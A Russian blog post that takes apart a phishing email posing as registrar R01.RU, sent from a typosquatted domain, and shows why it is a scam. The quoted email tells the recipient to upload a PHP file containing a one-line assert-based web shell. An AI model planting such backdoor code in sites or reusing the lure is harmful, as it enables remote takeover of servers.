Cyril Moshkow (wolk_off) wrote,
Cyril Moshkow
wolk_off

Category:

Кульные хацкеры ататат


Получаю письмо. Тут надо заметить, что письма у меня смотрятся не через браузер, а через специальный почтовый клиент, собирающий письма с нескольких адресов (рабочего, личного, запасного). В клиенте письма показываются строго как голый текст, никакого HTML. Поэтому ухищрения менее умелых кульных хацкеров, пытающихся захватить тот или иной принадлежащий мне сайт или доменное имя, видны как на ладони.

Отправитель: "R01.RU"
Тема: Необходима активация домена [один из моих доменов]

Текст:
Уважаемый клиент!

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом domain.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a7offau12fn0f83f.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[R01]));
?>

Файл должен быть создан в течение трех рабочих дней с момента получения настоящего письма и находиться на сервере до 28 декабря 2016 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.

© АО "Регистратор Р01"
8-800-775-37-77,
8-495-616-2747

Вы подписались на рассылку в настройках уведомлений.
Отписаться от рассылки

Что сразу бросается в глаза?
Что для показа в HTML адрес отправителя будет выглядеть как R01.RU, а это домен одного из регистраторов доменных имён. Но в действительности, как мы видим, настоящий адрес, с которого отправлено письмо - info@r01l.ru. Одна лишняя буква в доменном имени. А я же, видите ли, редактор. Мне лишние буквы полагается видеть.
Попытка же увидеть, что находится на домене r01l.ru, приводит... да ни к чему не приводит: ничего заслуживающего внимания там нет. Может так быть, если бы это был действительно сайт уважаемого официального регистратора доменов? Конечно, нет.

Оставим в стороне ещё и тот факт, что ни на какие рассылки R01.RU я не подписывался, мало того - домен, который тут у меня пытаются отжать, регистрировал через совсем другую контору.

В глаза бросается также то, что меня пытаются заставить положить в корень сайта исполняемый код. Да-да. Если на сайте есть поддержка php, то предлагаемый код будет выполнять любой запрос переменной [R01]. А в эту переменную можно ввести что угодно, включая программу захвата власти во Вселенной.

Другое дело, что на этом самом сайте никакой поддержки php нет, но это уже детали.

И ещё в глаза бросаются слова "фактическое управление доменом domain.ru". Тут у них должен был подставляться тот домен, управление которым они пытаются захватить. Но он у них не подставляется, потому что они криворукие. Так и шлётся письмо - с требованием подтвердить фактическое управление... совсем другим доменом, принадлежащим, в дополнение ко всему этому абсурду, другому регистратору доменов, компании SALENAMES!

При этом домен, который у меня пытаются отжать, у меня не один: у меня много других доменов, и я знаю, что подлинный регистратор доменных имён решает вопросы подтверждения владельца домена совсем-совсем другим способом - уж во всяком случае не посредством установки на соответствующие сайты исполняемого кода.

В общем, низачот вам, кульные хацкеры. Идите в пень.
Tags: техническое, фигасе
Subscribe

  • Post a new comment

    Error

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

    When you submit the form an invisible reCAPTCHA check will be performed.
    You must follow the Privacy Policy and Google Terms of use.
  • 8 comments